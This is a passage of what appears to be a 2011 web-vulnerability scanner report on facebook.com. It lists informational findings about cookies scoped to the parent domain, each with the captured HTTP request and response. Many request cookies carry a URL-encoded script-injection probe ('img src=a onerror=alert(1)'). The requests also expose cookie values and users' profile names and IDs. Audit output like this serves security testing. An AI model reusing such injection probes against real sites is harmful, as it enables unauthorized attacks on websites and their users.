Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259; wd=1022x1007

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.187.63
X-Cnection: close
Date: Thu, 05 May 2011 11:56:54 GMT
Content-Length: 0


10.79. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Alexander-Bucky-Jordan/1242845259

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Alexander-Bucky-Jordan/1242845259 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.41
Connection: close
Date: Thu, 05 May 2011 11:43:07 GMT
Content-Length: 15014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.80. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Alexander-Bucky-Jordan/1242845259

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Alexander-Bucky-Jordan/1242845259 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.157.53
X-Cnection: close
Date: Thu, 05 May 2011 11:56:56 GMT
Content-Length: 44258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.81. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Bucky-Jordan%20/100000824820783

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Bucky-Jordan%20/100000824820783 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; wd=907x1007

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/people/Bucky-Jordan/100000824820783
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.104.59
X-Cnection: close
Date: Thu, 05 May 2011 11:39:24 GMT
Content-Length: 0


10.82. http://www.facebook.com/people/Bucky-Jordan/100000824820783

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Bucky-Jordan/100000824820783

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • lsd=bYeMg; path=/; domain=.facebook.com
  • reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /people/Bucky-Jordan/100000824820783 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=bYeMg; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.233.110
X-Cnection: close
Date: Thu, 05 May 2011 02:50:59 GMT
Content-Length: 56884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.83. http://www.facebook.com/policy.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /policy.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • _e_nXwy_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /policy.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; act=1304613620616%2F2; _e_nXwy_1=%5B%22nXwy%22%2C1304613620617%2C%22act%22%2C1304613620616%2C2%2C%22http%3A%2F%2Fwww.facebook.com%2Fpolicy.php%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fr.php%3Fprofile_id%3D100000824820783%26next%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D100000824820783%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C657%2C204%2C12%2C981%2C16%5D

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.147.57
X-Cnection: close
Date: Thu, 05 May 2011 11:43:31 GMT
Content-Length: 58371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.84. http://www.facebook.com/privacy/explanation.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /privacy/explanation.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy/explanation.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.53
Connection: close
Date: Thu, 05 May 2011 11:43:04 GMT
Content-Length: 27769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.85. http://www.facebook.com/profile.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /profile.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /profile.php?id=1708077046 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/people/Roy-Chastain/1708077046
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.152.75
Connection: close
Date: Thu, 05 May 2011 11:42:14 GMT
Content-Length: 0


10.86. http://www.facebook.com/r.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /r.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.252.126
Connection: close
Date: Thu, 05 May 2011 10:56:46 GMT
Content-Length: 29390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.87. http://www.facebook.com/recover.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /recover.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /recover.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: https://www.facebook.com/recover.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.155.107
X-Cnection: close
Date: Thu, 05 May 2011 11:42:51 GMT
Content-Length: 0
Connection: close


10.88. http://www.facebook.com/robynalys

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /robynalys

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Frobynalys; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /robynalys HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Frobynalys; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.154.29
Connection: close
Date: Thu, 05 May 2011 11:42:29 GMT
Content-Length: 47590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.89. http://www.facebook.com/share.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /share.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /share.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.25.111
Connection: close
Date: Thu, 05 May 2011 10:56:46 GMT
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.90. http://www.facebook.com/sharer.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.32.111
Connection: close
Date: Thu, 05 May 2011 10:56:48 GMT
Content-Length: 10419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.91. http://www.facebook.com/skdarealist

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /skdarealist

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fskdarealist; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /skdarealist HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
